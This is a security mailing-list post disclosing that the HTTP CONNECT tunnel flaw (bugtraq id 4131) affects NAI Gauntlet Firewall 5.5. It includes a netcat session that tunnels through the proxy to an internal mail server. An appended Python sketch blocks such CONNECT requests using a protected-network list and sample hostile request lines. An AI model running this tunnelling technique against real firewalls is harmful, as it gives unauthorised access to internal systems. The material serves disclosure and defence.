Hi all,

I found some vulnerabilities on the NAI Gauntlet Firewall 5.5 on NT 4. These vulnerabilities were found in other firewalls, specifically proxy firewalls, and I tried them on the Gauntlet, it worked. I don't know if this was published earlier or not, but here it goes:

Vulnerability:
- Multiple Vendor HTTP CONNECT TCP Tunnel Vulnerability (bugtraq id 4131)

Examples:
(I'm using Volker Tanger [volker.tanger@discon.de]'s email: "CheckPoint FW1 HTTP Security Hole" example as a template for my example)

Client = x.x.x.x
Gauntlet = y.y.y.y
Internal Mailserver = z.z.z.z

    nc -v -n y.y.y.y 80
    (UNKNOWN) [y.y.y.y] 80 (?) open
    CONNECT z.z.z.z:25 HTTP/1.0
    HTTP/1.0 200 OK
    mail server banner

That's it!

Rashed Alabbar
Engineer
Security Management and Operations
Security Operations Center
Data Fort - Total Security Solutions
Dubai Internet City
P.O. Box: 500006, Dubai, United Arab Emirates
Email: rashed.alabbar@datafort.net
http://www.datafort.net
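
Added example (not part of the original post and not Gauntlet code): a sketch of the destination check an HTTP proxy can apply before opening a CONNECT tunnel, so that a request shaped like the one above is refused. The allowed port set, the protected network list and the sample request lines are assumptions constructed for illustration.

```python
import ipaddress

ALLOWED_PORTS = {443}  # assumption: only HTTPS tunnelling is required
# Assumption: address ranges behind the firewall that must never be tunnel targets
PROTECTED_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "::1/128", "fc00::/7")]

def parse_connect(request_line):
    """Return (host, port) from 'CONNECT host:port HTTP/x.y', or None if malformed."""
    parts = request_line.strip().split()
    if len(parts) != 3 or parts[0].upper() != "CONNECT" or not parts[2].startswith("HTTP/"):
        return None
    host, sep, port = parts[1].rpartition(":")
    host = host.strip("[]")  # brackets surround IPv6 literals
    if not (sep and host and port.isascii() and port.isdigit() and 0 < int(port) < 65536):
        return None
    return host, int(port)

def check_connect(request_line):
    """Decide whether the proxy should open the tunnel: (allowed, reason)."""
    target = parse_connect(request_line)
    if target is None:
        return False, "malformed CONNECT request"
    host, port = target
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not permitted for CONNECT"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Hostname: a real proxy must repeat the network check on the resolved address
        return True, "allowed (hostname; re-check after DNS resolution)"
    addr = getattr(addr, "ipv4_mapped", None) or addr  # unwrap ::ffff:a.b.c.d
    if any(addr in net for net in PROTECTED_NETS):
        return False, f"{addr} is inside a protected network"
    return True, "allowed"

# Constructed request lines; the first has the shape of the request in the post
SAMPLES = [
    "CONNECT 10.1.2.3:25 HTTP/1.0",
    "CONNECT 192.168.0.5:443 HTTP/1.0",
    "CONNECT www.example.com:443 HTTP/1.1",
    "CONNECT 198.51.100.7:443 HTTP/1.1",
    "CONNECT [::ffff:10.0.0.1]:443 HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(line, "->", check_connect(line))
```

The same decision can be run over proxy access logs to flag CONNECT requests that were answered with 200 for a port or address this policy would have refused.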